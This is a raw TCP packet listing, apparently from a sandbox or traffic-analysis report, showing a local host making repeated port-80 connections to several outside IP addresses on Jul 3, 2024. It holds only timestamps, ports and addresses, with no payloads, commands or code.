                                                            Jul 3, 2024 17:38:05.842991114 CEST8049797103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:06.298194885 CEST4979780192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:06.407634020 CEST8049797103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:06.407727957 CEST8049797103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:06.407741070 CEST8049797103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:06.407843113 CEST8049797103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:06.407845974 CEST4979780192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:06.407995939 CEST4979780192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:06.407996893 CEST4979780192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:06.408109903 CEST4979780192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:06.410883904 CEST8049797103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:06.410897970 CEST8049797103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:06.411149979 CEST4979780192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:06.411149979 CEST4979780192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:06.440820932 CEST8049797103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:06.440999031 CEST4979780192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:06.450289965 CEST8049797103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:06.450382948 CEST8049797103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:06.450475931 CEST4979780192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:06.450582027 CEST8049797103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:06.450589895 CEST4979780192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:06.450702906 CEST8049797103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:06.450706959 CEST4979780192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:06.652730942 CEST8049797103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:07.329433918 CEST4979880192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:07.689198017 CEST8049798103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:07.689511061 CEST4979880192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:07.702914000 CEST4979880192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:08.056015015 CEST8049798103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:08.600579023 CEST8049798103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:08.600594997 CEST8049798103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:08.600965023 CEST4979880192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:08.607691050 CEST4979880192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:08.966783047 CEST8049798103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:13.832983971 CEST4979980192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:14.016344070 CEST8049799203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:14.016877890 CEST4979980192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:14.032248974 CEST4979980192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:14.208826065 CEST8049799203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:14.226490974 CEST8049799203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:14.226507902 CEST8049799203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:14.226520061 CEST8049799203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:14.226532936 CEST8049799203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:14.226572990 CEST8049799203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:14.226587057 CEST8049799203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:14.226728916 CEST8049799203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:14.226742029 CEST8049799203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:14.226803064 CEST4979980192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:14.226844072 CEST8049799203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:14.226856947 CEST8049799203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:14.226974010 CEST4979980192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:14.227143049 CEST4979980192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:14.408354998 CEST8049799203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:14.408370018 CEST8049799203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:14.408519983 CEST4979980192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:14.408525944 CEST8049799203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:14.408689022 CEST4979980192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:15.546391964 CEST4979980192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:16.578078985 CEST4980080192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:16.765945911 CEST8049800203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:16.766118050 CEST4980080192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:16.781913042 CEST4980080192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:16.955415964 CEST8049800203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:16.967883110 CEST8049800203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:16.967956066 CEST8049800203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:16.968014956 CEST8049800203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:16.968070030 CEST8049800203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:16.968126059 CEST8049800203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:16.968214989 CEST8049800203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:16.968216896 CEST4980080192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:16.968277931 CEST8049800203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:16.968333006 CEST8049800203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:16.968386889 CEST8049800203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:16.968388081 CEST4980080192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:16.968388081 CEST4980080192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:16.968442917 CEST8049800203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:16.968559980 CEST4980080192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:16.968718052 CEST4980080192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:17.144581079 CEST8049800203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:17.144604921 CEST8049800203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:17.144627094 CEST8049800203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:17.144797087 CEST4980080192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:18.295553923 CEST4980080192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:19.325069904 CEST4980180192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:19.504719973 CEST8049801203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:19.505256891 CEST4980180192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:19.538357019 CEST4980180192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:19.538407087 CEST4980180192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:19.538464069 CEST4980180192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:19.712805986 CEST8049801203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:19.713001013 CEST4980180192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:19.713049889 CEST4980180192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:19.713098049 CEST4980180192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:19.713247061 CEST8049801203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:19.713257074 CEST8049801203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:19.713468075 CEST8049801203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:19.713526011 CEST4980180192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:19.713577032 CEST4980180192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:19.713633060 CEST4980180192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:19.713802099 CEST4980180192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:19.892627001 CEST8049801203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:19.892637968 CEST8049801203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:19.892647028 CEST8049801203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:19.892807007 CEST4980180192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:19.892855883 CEST4980180192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:19.892915964 CEST4980180192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:19.893083096 CEST4980180192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:20.071377039 CEST8049801203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:20.071394920 CEST8049801203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:20.071407080 CEST8049801203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:20.098349094 CEST8049801203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:20.098453999 CEST8049801203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:20.098535061 CEST8049801203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:20.098586082 CEST8049801203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:20.098634005 CEST8049801203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:20.098679066 CEST4980180192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:20.098681927 CEST8049801203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:20.098731995 CEST8049801203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:20.098830938 CEST8049801203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:20.098916054 CEST4980180192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:20.098916054 CEST4980180192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:20.098925114 CEST8049801203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:20.099004030 CEST8049801203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:20.099136114 CEST4980180192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:20.099278927 CEST4980180192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:20.273751020 CEST8049801203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:20.273824930 CEST8049801203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:20.273878098 CEST8049801203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:20.274068117 CEST4980180192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:21.046070099 CEST4980180192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:22.074460030 CEST4980280192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:22.249052048 CEST8049802203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:22.249209881 CEST4980280192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:22.262573957 CEST4980280192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:22.437717915 CEST8049802203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:22.447380066 CEST8049802203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:22.447443962 CEST8049802203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:22.447549105 CEST8049802203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:22.447562933 CEST8049802203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:22.447722912 CEST4980280192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:22.447741032 CEST8049802203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:22.447756052 CEST8049802203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:22.447869062 CEST8049802203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:22.447884083 CEST8049802203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:22.447892904 CEST4980280192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:22.448062897 CEST4980280192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:22.448062897 CEST4980280192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:22.448076010 CEST8049802203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:22.448122025 CEST8049802203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:22.448282003 CEST4980280192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:22.621212959 CEST8049802203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:22.621293068 CEST8049802203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:22.621342897 CEST8049802203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:22.621527910 CEST4980280192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:22.621527910 CEST4980280192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:22.633164883 CEST4980280192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:22.806055069 CEST8049802203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:27.807116032 CEST4980380192.168.11.20172.67.146.224
                                                            Jul 3, 2024 17:38:27.926387072 CEST8049803172.67.146.224192.168.11.20
                                                            Jul 3, 2024 17:38:27.926491976 CEST4980380192.168.11.20172.67.146.224
                                                            Jul 3, 2024 17:38:27.957123995 CEST4980380192.168.11.20172.67.146.224
                                                            Jul 3, 2024 17:38:28.076431990 CEST8049803172.67.146.224192.168.11.20
                                                            Jul 3, 2024 17:38:28.196312904 CEST8049803172.67.146.224192.168.11.20
                                                            Jul 3, 2024 17:38:28.196326971 CEST8049803172.67.146.224192.168.11.20
                                                            Jul 3, 2024 17:38:28.196336985 CEST8049803172.67.146.224192.168.11.20
                                                            Jul 3, 2024 17:38:28.196383953 CEST8049803172.67.146.224192.168.11.20
                                                            Jul 3, 2024 17:38:28.196501970 CEST4980380192.168.11.20172.67.146.224
                                                            Jul 3, 2024 17:38:28.197015047 CEST8049803172.67.146.224192.168.11.20
                                                            Jul 3, 2024 17:38:28.197195053 CEST4980380192.168.11.20172.67.146.224
                                                            Jul 3, 2024 17:38:29.465008974 CEST4980380192.168.11.20172.67.146.224
                                                            Jul 3, 2024 17:38:30.494564056 CEST4980480192.168.11.20172.67.146.224
                                                            Jul 3, 2024 17:38:30.613733053 CEST8049804172.67.146.224192.168.11.20
                                                            Jul 3, 2024 17:38:30.613922119 CEST4980480192.168.11.20172.67.146.224
                                                            Jul 3, 2024 17:38:30.629728079 CEST4980480192.168.11.20172.67.146.224
                                                            Jul 3, 2024 17:38:30.748795033 CEST8049804172.67.146.224192.168.11.20
                                                            Jul 3, 2024 17:38:30.869544029 CEST8049804172.67.146.224192.168.11.20
                                                            Jul 3, 2024 17:38:30.869559050 CEST8049804172.67.146.224192.168.11.20
                                                            Jul 3, 2024 17:38:30.869570017 CEST8049804172.67.146.224192.168.11.20
                                                            Jul 3, 2024 17:38:30.869698048 CEST4980480192.168.11.20172.67.146.224
                                                            Jul 3, 2024 17:38:30.869904041 CEST8049804172.67.146.224192.168.11.20
                                                            Jul 3, 2024 17:38:30.870021105 CEST4980480192.168.11.20172.67.146.224
                                                            Jul 3, 2024 17:38:32.136482954 CEST4980480192.168.11.20172.67.146.224
                                                            Jul 3, 2024 17:38:33.166774988 CEST4980580192.168.11.20172.67.146.224
                                                            Jul 3, 2024 17:38:33.285780907 CEST8049805172.67.146.224192.168.11.20
                                                            Jul 3, 2024 17:38:33.286022902 CEST4980580192.168.11.20172.67.146.224
                                                            Jul 3, 2024 17:38:33.302954912 CEST4980580192.168.11.20172.67.146.224
                                                            Jul 3, 2024 17:38:33.303030968 CEST4980580192.168.11.20172.67.146.224
                                                            Jul 3, 2024 17:38:33.422528982 CEST8049805172.67.146.224192.168.11.20
                                                            Jul 3, 2024 17:38:33.422554970 CEST8049805172.67.146.224192.168.11.20
                                                            Jul 3, 2024 17:38:33.422760010 CEST4980580192.168.11.20172.67.146.224
                                                            Jul 3, 2024 17:38:33.422909975 CEST4980580192.168.11.20172.67.146.224
                                                            Jul 3, 2024 17:38:33.423000097 CEST8049805172.67.146.224192.168.11.20
                                                            Jul 3, 2024 17:38:33.423089027 CEST4980580192.168.11.20172.67.146.224
                                                            Jul 3, 2024 17:38:33.423257113 CEST4980580192.168.11.20172.67.146.224
                                                            Jul 3, 2024 17:38:33.541549921 CEST8049805172.67.146.224192.168.11.20
                                                            Jul 3, 2024 17:38:33.541639090 CEST8049805172.67.146.224192.168.11.20
                                                            Jul 3, 2024 17:38:33.541739941 CEST8049805172.67.146.224192.168.11.20
                                                            Jul 3, 2024 17:38:33.541755915 CEST8049805172.67.146.224192.168.11.20
                                                            Jul 3, 2024 17:38:33.541802883 CEST4980580192.168.11.20172.67.146.224
                                                            Jul 3, 2024 17:38:33.541842937 CEST8049805172.67.146.224192.168.11.20
                                                            Jul 3, 2024 17:38:33.541858912 CEST8049805172.67.146.224192.168.11.20
                                                            Jul 3, 2024 17:38:33.541872978 CEST8049805172.67.146.224192.168.11.20
                                                            Jul 3, 2024 17:38:33.541888952 CEST8049805172.67.146.224192.168.11.20
                                                            Jul 3, 2024 17:38:33.541974068 CEST4980580192.168.11.20172.67.146.224
                                                            Jul 3, 2024 17:38:33.542007923 CEST8049805172.67.146.224192.168.11.20
                                                            Jul 3, 2024 17:38:33.542113066 CEST4980580192.168.11.20172.67.146.224
                                                            Jul 3, 2024 17:38:33.542124033 CEST8049805172.67.146.224192.168.11.20
                                                            Jul 3, 2024 17:38:33.542232990 CEST8049805172.67.146.224192.168.11.20
                                                            Jul 3, 2024 17:38:33.542249918 CEST8049805172.67.146.224192.168.11.20
                                                            Jul 3, 2024 17:38:33.542263031 CEST8049805172.67.146.224192.168.11.20
                                                            Jul 3, 2024 17:38:33.660713911 CEST8049805172.67.146.224192.168.11.20
                                                            Jul 3, 2024 17:38:33.660773993 CEST8049805172.67.146.224192.168.11.20
                                                            Jul 3, 2024 17:38:33.660876036 CEST8049805172.67.146.224192.168.11.20
                                                            Jul 3, 2024 17:38:33.660903931 CEST8049805172.67.146.224192.168.11.20
                                                            Jul 3, 2024 17:38:33.660939932 CEST8049805172.67.146.224192.168.11.20
                                                            Jul 3, 2024 17:38:33.806667089 CEST8049805172.67.146.224192.168.11.20
                                                            Jul 3, 2024 17:38:33.806680918 CEST8049805172.67.146.224192.168.11.20
                                                            Jul 3, 2024 17:38:33.806690931 CEST8049805172.67.146.224192.168.11.20
                                                            Jul 3, 2024 17:38:33.806848049 CEST4980580192.168.11.20172.67.146.224
                                                            Jul 3, 2024 17:38:33.807472944 CEST8049805172.67.146.224192.168.11.20
                                                            Jul 3, 2024 17:38:33.925874949 CEST8049805172.67.146.224192.168.11.20
                                                            Jul 3, 2024 17:38:35.837086916 CEST4980680192.168.11.20172.67.146.224
                                                            Jul 3, 2024 17:38:35.956403971 CEST8049806172.67.146.224192.168.11.20
                                                            Jul 3, 2024 17:38:35.956594944 CEST4980680192.168.11.20172.67.146.224
                                                            Jul 3, 2024 17:38:35.975142002 CEST4980680192.168.11.20172.67.146.224
                                                            Jul 3, 2024 17:38:36.099627018 CEST8049806172.67.146.224192.168.11.20
                                                            Jul 3, 2024 17:38:36.214675903 CEST8049806172.67.146.224192.168.11.20
                                                            Jul 3, 2024 17:38:36.214689970 CEST8049806172.67.146.224192.168.11.20
                                                            Jul 3, 2024 17:38:36.214701891 CEST8049806172.67.146.224192.168.11.20
                                                            Jul 3, 2024 17:38:36.214871883 CEST8049806172.67.146.224192.168.11.20
                                                            Jul 3, 2024 17:38:36.215001106 CEST4980680192.168.11.20172.67.146.224
                                                            Jul 3, 2024 17:38:36.215001106 CEST4980680192.168.11.20172.67.146.224
                                                            Jul 3, 2024 17:38:36.226609945 CEST4980680192.168.11.20172.67.146.224
                                                            Jul 3, 2024 17:38:36.540422916 CEST4980680192.168.11.20172.67.146.224
                                                            Jul 3, 2024 17:38:36.662398100 CEST8049806172.67.146.224192.168.11.20
                                                            Jul 3, 2024 17:38:41.400437117 CEST4980780192.168.11.2044.227.65.245
                                                            Jul 3, 2024 17:38:41.580544949 CEST804980744.227.65.245192.168.11.20
                                                            Jul 3, 2024 17:38:41.581178904 CEST4980780192.168.11.2044.227.65.245
                                                            Jul 3, 2024 17:38:41.597037077 CEST4980780192.168.11.2044.227.65.245
                                                            Jul 3, 2024 17:38:41.774126053 CEST804980744.227.65.245192.168.11.20
                                                            Jul 3, 2024 17:38:41.779546022 CEST804980744.227.65.245192.168.11.20
                                                            Jul 3, 2024 17:38:41.779557943 CEST804980744.227.65.245192.168.11.20
                                                            Jul 3, 2024 17:38:41.779784918 CEST4980780192.168.11.2044.227.65.245
                                                            Jul 3, 2024 17:38:43.102719069 CEST4980780192.168.11.2044.227.65.245
                                                            Jul 3, 2024 17:38:44.132128000 CEST4980880192.168.11.2044.227.65.245
                                                            Jul 3, 2024 17:38:44.309923887 CEST804980844.227.65.245192.168.11.20
                                                            Jul 3, 2024 17:38:44.310097933 CEST4980880192.168.11.2044.227.65.245
                                                            Jul 3, 2024 17:38:44.325926065 CEST4980880192.168.11.2044.227.65.245
                                                            Jul 3, 2024 17:38:44.502871037 CEST804980844.227.65.245192.168.11.20
                                                            Jul 3, 2024 17:38:44.508347034 CEST804980844.227.65.245192.168.11.20
                                                            Jul 3, 2024 17:38:44.508358955 CEST804980844.227.65.245192.168.11.20
                                                            Jul 3, 2024 17:38:44.508511066 CEST4980880192.168.11.2044.227.65.245
                                                            Jul 3, 2024 17:38:45.836464882 CEST4980880192.168.11.2044.227.65.245
                                                            Jul 3, 2024 17:38:46.865943909 CEST4980980192.168.11.2044.227.65.245
                                                            Jul 3, 2024 17:38:47.044277906 CEST804980944.227.65.245192.168.11.20
                                                            Jul 3, 2024 17:38:47.044482946 CEST4980980192.168.11.2044.227.65.245
                                                            Jul 3, 2024 17:38:47.061451912 CEST4980980192.168.11.2044.227.65.245
                                                            Jul 3, 2024 17:38:47.061474085 CEST4980980192.168.11.2044.227.65.245
                                                            Jul 3, 2024 17:38:47.061520100 CEST4980980192.168.11.2044.227.65.245
                                                            Jul 3, 2024 17:38:47.239042997 CEST804980944.227.65.245192.168.11.20
                                                            Jul 3, 2024 17:38:47.239156961 CEST804980944.227.65.245192.168.11.20
                                                            Jul 3, 2024 17:38:47.239167929 CEST804980944.227.65.245192.168.11.20
                                                            Jul 3, 2024 17:38:47.239252090 CEST4980980192.168.11.2044.227.65.245
                                                            Jul 3, 2024 17:38:47.239269018 CEST804980944.227.65.245192.168.11.20
                                                            Jul 3, 2024 17:38:47.239280939 CEST804980944.227.65.245192.168.11.20
                                                            Jul 3, 2024 17:38:47.239289045 CEST804980944.227.65.245192.168.11.20
                                                            Jul 3, 2024 17:38:47.239456892 CEST4980980192.168.11.2044.227.65.245
                                                            Jul 3, 2024 17:38:47.239589930 CEST4980980192.168.11.2044.227.65.245
                                                            Jul 3, 2024 17:38:47.239762068 CEST4980980192.168.11.2044.227.65.245
                                                            Jul 3, 2024 17:38:47.243540049 CEST804980944.227.65.245192.168.11.20
                                                            Jul 3, 2024 17:38:47.288064003 CEST4980980192.168.11.2044.227.65.245
                                                            Jul 3, 2024 17:38:47.417196035 CEST804980944.227.65.245192.168.11.20
                                                            Jul 3, 2024 17:38:47.417309999 CEST804980944.227.65.245192.168.11.20
                                                            Jul 3, 2024 17:38:47.417320967 CEST804980944.227.65.245192.168.11.20
                                                            Jul 3, 2024 17:38:47.417329073 CEST804980944.227.65.245192.168.11.20
                                                            Jul 3, 2024 17:38:47.417387009 CEST4980980192.168.11.2044.227.65.245
                                                            Jul 3, 2024 17:38:47.417419910 CEST804980944.227.65.245192.168.11.20
                                                            Jul 3, 2024 17:38:47.417548895 CEST4980980192.168.11.2044.227.65.245
                                                            Jul 3, 2024 17:38:47.417742968 CEST4980980192.168.11.2044.227.65.245
                                                            Jul 3, 2024 17:38:47.418843985 CEST804980944.227.65.245192.168.11.20
                                                            Jul 3, 2024 17:38:47.595181942 CEST804980944.227.65.245192.168.11.20
                                                            Jul 3, 2024 17:38:47.595279932 CEST804980944.227.65.245192.168.11.20
                                                            Jul 3, 2024 17:38:47.595292091 CEST804980944.227.65.245192.168.11.20
                                                            Jul 3, 2024 17:38:47.595393896 CEST804980944.227.65.245192.168.11.20
                                                            Jul 3, 2024 17:38:47.595406055 CEST804980944.227.65.245192.168.11.20
                                                            Jul 3, 2024 17:38:47.595597029 CEST4980980192.168.11.2044.227.65.245
                                                            Jul 3, 2024 17:38:48.570252895 CEST4980980192.168.11.2044.227.65.245
                                                            Jul 3, 2024 17:38:49.599684954 CEST4981080192.168.11.2044.227.65.245
                                                            Jul 3, 2024 17:38:49.777256012 CEST804981044.227.65.245192.168.11.20
                                                            Jul 3, 2024 17:38:49.777475119 CEST4981080192.168.11.2044.227.65.245
                                                            Jul 3, 2024 17:38:49.790857077 CEST4981080192.168.11.2044.227.65.245
                                                            Jul 3, 2024 17:38:49.971919060 CEST804981044.227.65.245192.168.11.20
                                                            Jul 3, 2024 17:38:49.972012997 CEST804981044.227.65.245192.168.11.20
                                                            Jul 3, 2024 17:38:49.972023010 CEST804981044.227.65.245192.168.11.20
                                                            Jul 3, 2024 17:38:49.972264051 CEST4981080192.168.11.2044.227.65.245
                                                            Jul 3, 2024 17:38:49.979000092 CEST4981080192.168.11.2044.227.65.245
                                                            Jul 3, 2024 17:38:50.156114101 CEST804981044.227.65.245192.168.11.20
                                                            Jul 3, 2024 17:38:55.186501980 CEST4981180192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:38:55.306066036 CEST80498113.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:38:55.306241035 CEST4981180192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:38:55.322060108 CEST4981180192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:38:55.442831039 CEST80498113.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:38:55.464915037 CEST80498113.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:38:55.465109110 CEST4981180192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:38:56.834074020 CEST4981180192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:38:56.960848093 CEST80498113.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:38:57.863496065 CEST4981280192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:38:57.988152027 CEST80498123.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:38:57.988359928 CEST4981280192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:38:58.004158974 CEST4981280192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:38:58.147641897 CEST80498123.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:38:58.163288116 CEST80498123.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:38:58.163434029 CEST4981280192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:38:59.520973921 CEST4981280192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:38:59.666304111 CEST80498123.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:39:00.550467014 CEST4981380192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:39:00.669298887 CEST80498133.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:39:00.669584036 CEST4981380192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:39:00.686530113 CEST4981380192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:39:00.686599016 CEST4981380192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:39:00.805062056 CEST80498133.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:39:00.805171967 CEST80498133.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:39:00.805183887 CEST80498133.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:39:00.805247068 CEST4981380192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:39:00.805308104 CEST80498133.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:39:00.805322886 CEST80498133.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:39:00.805332899 CEST80498133.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:39:00.805340052 CEST80498133.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:39:00.805347919 CEST80498133.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:39:00.805356979 CEST80498133.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:39:00.805387020 CEST80498133.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:39:00.805408955 CEST4981380192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:39:00.805560112 CEST4981380192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:39:00.805762053 CEST4981380192.168.11.203.33.130.190
